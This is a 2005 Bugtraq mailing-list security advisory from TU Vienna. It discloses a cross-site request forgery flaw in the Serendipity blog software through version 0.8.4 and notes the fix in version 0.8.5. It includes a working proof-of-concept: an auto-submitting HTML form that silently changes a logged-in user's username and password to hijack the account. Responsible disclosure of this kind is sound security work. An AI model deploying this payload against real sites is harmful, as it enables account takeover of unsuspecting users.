Serendipity: Account Hijacking / CSRF Vulnerability
enji_at_infosys.tuwien.ac.at
Date: 09/29/05
- Previous message: Michael Stone: "[SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error"
- Next in thread: kreon: "Re: Serendipity: Account Hijacking / CSRF Vulnerability"
- Reply: kreon: "Re: Serendipity: Account Hijacking / CSRF Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 29 Sep 2005 12:58:48 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is) ===========================================================
Serendipity: Account Hijacking / CSRF Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005
===========================================================
Affected applications
----------------------
Serendipity (www.s9y.org)
Versions 0.8.4 and prior.
Description
------------
An attacker is able to change the username and password of a logged-in user
(and can therefore hijack his account) by tricking the user into clicking a
link to a page with the following contents:
<form action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&serendipity[adminAction]=save" method="post">
<input type="text" name="username" value="evilguy" />
<input type="text" name="password" value="evilpass" />
<input type="text" name="realname" value="John Doe" />
<input type="text" name="userlevel" value="255"/>
<input type="text" name="email" value="john@example.com" />
<input type="text" name="lang" value="en"/>
<input type="submit" name="SAVE" value="Save" />
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
The fields "your-server" and "path-to-s9y" in the form's action attribute have to
be adjusted accordingly.
Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.
Solution
---------
Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem itself.
Acknowledgements
-----------------
Thanks to Serendipity developer Garvin Hicking for his quick response and
professional cooperation.
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at
- Previous message: Michael Stone: "[SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error"
- Next in thread: kreon: "Re: Serendipity: Account Hijacking / CSRF Vulnerability"
- Reply: kreon: "Re: Serendipity: Account Hijacking / CSRF Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
